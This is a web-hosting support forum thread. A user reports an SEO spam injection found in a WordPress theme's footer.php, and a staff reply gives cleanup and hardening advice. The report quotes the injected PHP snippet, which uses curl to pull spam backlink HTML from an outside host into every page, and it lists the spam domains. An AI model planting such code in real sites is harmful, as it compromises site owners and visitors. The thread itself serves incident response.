Security incident with all my pages

44zero

Hey guys,

A SEO spam injection was identified on our WordPress sites where we use BeTheme. One is only one month old, only plugin is WP-rocket.

Multiple live pages contained a hidden backlink block directly before the closing </body> tag. The injected links pointed to external spam domains, including:

jiaoyu.dianzishu.com

digitalgurukul.in

topsalesconsulting.com/cazadores

pmx.com.pk

isris.org

The visible anchor texts included casino-related terms such as:

BANDAR SLOT

SLOT THAILAND

The source was found in the active WordPress theme file footer.php. A malicious PHP snippet had been inserted directly before </body>:

$ch = curl_init('https://bibitgroup.org/api/backlink?domain=' . urlencode($_SERVER['HTTP_HOST']));

curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);

curl_setopt($ch, CURLOPT_TIMEOUT, 3);

echo curl_exec($ch);

curl_close($ch);

This code dynamically fetched backlink content from bibitgroup.org and printed the response into the frontend HTML.

After removing the injected code and clearing the WordPress/WP Rocket cache, a follow-up live check showed that the known spam links were no longer present on the tested pages, including the homepage, /kontakt/, /arbeitsrecht/, /mietrecht/, and /impressum/.

A related SEO spam pattern was also observed on another page, including a suspicious AMP association in Google Search Console pointing to:

https://kcalculatorxbandarslot.vercel.app/

Any thoughts?

Best

Jannis

Phil

Hi,

Thank you for providing such a detailed report and the specific code snippet found in your footer.php. This is a classic example of a "SEO Spam Injection" or "WordPress Backdoor," and the fact that it occurred on a site with minimal plugins (only WP Rocket) suggests a few possible entry points.

The PHP snippet you found is designed to dynamically pull spam links from a remote server (bibitgroup.org), making it harder to detect via static scanners since the links themselves aren't stored in your database.

Here are a few suggestions and steps you should take immediately to secure your environment:

1. Check for the Entry Point: Since you only use WP Rocket, check if your version of BeTheme or WP Rocket is up to date. Vulnerabilities in outdated themes or plugins are the most common entry points. Also, ensure your WordPress Core is updated.
2. Audit Your Server for Backdoors: Simply removing the code from footer.php might not be enough. Attackers often leave "backdoors" (hidden scripts) in other directories like wp-content/uploads or wp-includes to regain access later.
3. Credential Reset (Crucial): If they were able to edit your footer.php, they likely had file system access or admin-level WP access.
   • Change all FTP/SFTP/Hosting Panel passwords.
   • Change all WordPress Admin passwords.
   • Update your Salt Keys in wp-config.php to force-logout all current sessions.
4. File Permissions: Ensure your file permissions are hardened. Typically, 644 for files and 755 for folders. Consider temporarily setting footer.php to 444 (read-only) after cleaning it.
5. Check for "Ghost" Admins: Go to Users -> All Users and check for any unauthorized accounts with Administrator privileges.
6. Scan for Database Injections: Sometimes spam links are also injected into the wp_posts or wp_options tables.

Best regards

Learn more: Video Tutorials | How To | FAQ Vote on what comes next